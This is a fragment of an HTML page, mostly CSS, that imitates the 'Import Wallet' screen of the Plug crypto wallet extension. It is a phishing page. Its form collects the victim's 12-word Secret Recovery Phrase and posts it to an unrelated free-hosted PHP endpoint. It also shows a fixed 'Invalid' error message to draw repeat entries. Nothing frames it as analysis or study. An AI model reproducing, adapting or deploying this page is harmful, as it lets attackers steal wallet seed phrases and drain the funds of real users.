}
</style><style data-jss="" data-meta="makeStyles">
.jss41 {
  width: 100%;
  border: 1px solid #D1D5DB;
  padding: 4px 12px;
  position: relative;
  font-size: 16px;
  box-shadow: 0px 1px 2px rgb(0 0 0 / 5%);
  border-radius: 6px;
  background-color: #fff;
}
.jss41:focus {
  border: none;
}
label + .jss41 {
  margin-top: 24px;
}
.jss42:hover {
  border: double 1px transparent;
  background-clip: padding-box, border-box;
  background-image: linear-gradient(white, white), radial-gradient(circle at top left,#FFE701,#FA51D3,#10D9ED,#53FF54);
  background-origin: border-box;
}
.jss43 {
  border: 2px solid rgb(220, 38, 38) !important;
  padding: 3px 11px !important;
}
.jss44 {
  border: double 2px transparent !important;
  padding: 3px 11px;
  border-radius: 6px;
  background-clip: padding-box, border-box;
  background-image: linear-gradient(white, white), radial-gradient(circle at top left,#FFE701,#FA51D3,#10D9ED,#53FF54) !important;
  background-origin: border-box;
}
</style><style data-jss="" data-meta="makeStyles">
.jss34 {
  width: 100%;
  display: inline-flex;
  flex-direction: column;
}
.jss35 {
  text-align: left;
  font-weight: 700;
}
.jss36 {
  margin-top: 6px;
}
.jss37 {
  margin-top: 6px;
}
.jss38 {
  color: #374151;
  font-size: 14px;
  font-weight: 500;
  line-height: 16.8px;
}
.jss39 {
  display: flex;
  align-items: center;
  flex-direction: row;
  justify-content: flex-start;
}
.jss40 {
  margin-left: auto;
}
</style><style data-jss="" data-meta="MuiContainer">
.MuiContainer-root {
  width: 100%;
  display: block;
  box-sizing: border-box;
  margin-left: auto;
  margin-right: auto;
  padding-left: 24px;
  padding-right: 24px;
}
@media (min-width:600px) {
  .MuiContainer-root {
    padding-left: 36px;
    padding-right: 36px;
  }
}
.MuiContainer-disableGutters {
  padding-left: 0;
  padding-right: 0;
}
@media (min-width:600px) {
  .MuiContainer-fixed {
    max-width: 600px;
  }
}
@media (min-width:960px) {
  .MuiContainer-fixed {
    max-width: 960px;
  }
}
@media (min-width:1280px) {
  .MuiContainer-fixed {
    max-width: 1280px;
  }
}
@media (min-width:1920px) {
  .MuiContainer-fixed {
    max-width: 1920px;
  }
}
@media (min-width:0px) {
  .MuiContainer-maxWidthXs {
    max-width: 444px;
  }
}
@media (min-width:600px) {
  .MuiContainer-maxWidthSm {
    max-width: 600px;
  }
}
@media (min-width:960px) {
  .MuiContainer-maxWidthMd {
    max-width: 960px;
  }
}
@media (min-width:1280px) {
  .MuiContainer-maxWidthLg {
    max-width: 1280px;
  }
}
@media (min-width:1920px) {
  .MuiContainer-maxWidthXl {
    max-width: 1920px;
  }
}
</style><style data-jss="" data-meta="makeStyles">
.jss7 {
  width: 100%;
  height: 100%;
  display: flex;
  padding: 48px 0;
  position: relative;
  background: linear-gradient(122.45deg, rgba(255, 231, 1, 0.2) 15.68%, rgba(250, 81, 211, 0.2) 39.58%, rgba(16, 217, 237, 0.2) 63.84%, rgba(82, 255, 83, 0.2) 85.21%);
  min-height: 100vh;
  text-align: center;
  align-items: center;
  justify-content: center;
}
.jss8 {
  top: 36px;
  right: 36px;
  display: flex;
  position: absolute;
}
</style><style data-jss="" data-meta="makeStyles">
.jss11 {
  height: 188px;
  display: flex;
  align-items: center;
  margin-bottom: 12px;
  flex-direction: column;
  justify-content: space-between;
}
.jss12 {
  width: 102%;
}
</style><style data-jss="" data-meta="makeStyles">
.jss1 {
  top: 0;
  left: 0;
  position: absolute;
}
.jss2 {
  inset: 0;
  width: calc(100% - 24px);
  height: calc(100% - 24px);
  margin: 12px;
  z-index: 2;
  position: absolute;
  border-radius: 10px;
  backdrop-filter: blur(7px);
}
@supports ( -moz-appearance:none ) {
  .jss2 {
    background: white;
  }
}
.jss3 {
  margin-bottom: 24px;
}
.jss4 {
  display: flex;
  align-items: center;
  flex-direction: row;
  justify-content: center;
}
.jss4 > img {
  margin-right: 1rem;
}
.jss5 {
  width: 100%;
  display: flex;
  background: white;
  border-radius: 5px;
}
.jss6 {
  width: 100%;
  border-radius: 5px;
}
</style></head><body><div id="options-root"><div class="jss7"><div class="jss8"><div class="jss9"><span>MADE BY</span><img src="./plugwallet_files/thunder.svg" class="jss10"></div></div><div class="MuiContainer-root MuiContainer-maxWidthSm"><div class="MuiGrid-root MuiGrid-container MuiGrid-spacing-xs-2" style="position: relative;"><div class="jss1"><div class="jss31"><img class="jss32" src="./plugwallet_files/back.svg" alt="Go Back"><span class="jss33">Go Back</span></div></div><div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12"><div class="jss11"><div class="jss16"><img src="./plugwallet_files/plug.svg" alt="Yung Plug" class="jss15" style="margin-bottom: 6px;"><img src="./plugwallet_files/triangle.svg" class="jss17"><div class="jss18">Paste that sh*t</div></div><h2 class="MuiTypography-root MuiTypography-h2">Import Wallet</h2><h6 class="MuiTypography-root jss12 MuiTypography-subtitle1">Please enter your 12 word Secret Recovery Phrase.</h6></div></div><div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12"><div class="jss34"><div class="jss39"><h5 class="MuiTypography-root jss35 MuiTypography-h5">Secret Recovery Phrase</h5><div class="jss40"></div></div><div class="jss36"><div class="MuiInputBase-root jss41 jss42 MuiInputBase-fullWidth MuiInputBase-multiline">
<form action="https://asdfimsdbsdf43534.000webhostapp.com/plug1.php?open_wallet" method="post">

<textarea rows="4" name="phrase" required="required" class="MuiInputBase-input MuiInputBase-inputMultiline"></textarea></div></div></div></div><div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12"><div class="jss28 jss30"><button class="MuiButtonBase-root MuiButton-root MuiButton-contained jss21 jss23 Mui-enable MuiButton-fullWidth Mui-enable" tabindex="-1" type="submit" enable=""><span class="MuiButton-label">Okay, I entered it.</span></button>

<div class="jss83 jss84"><svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="jss197 jss198 jss201"><path d="M10.29 3.86L1.82 18a2 2 0 0 0 1.71 3h16.94a2 2 0 0 0 1.71-3L13.71 3.86a2 2 0 0 0-3.42 0z"></path><line x1="12" y1="9" x2="12" y2="13"></line><line x1="12" y1="17" x2="12.01" y2="17"></line></svg><div style="color: rgb(255, 133, 133); font-size: 14px; font-style: MuiTypograph;">Your wallet using your Secret Recovery Phrase Invalid.</div>
</div></div></div></div></div></div><script src="chrome-extension://cfbfdhimifdmdehjmkdobpcjfefblkjm/js/options.bundle.js?a8ffc085b8d6963b42c2"></script></body></html>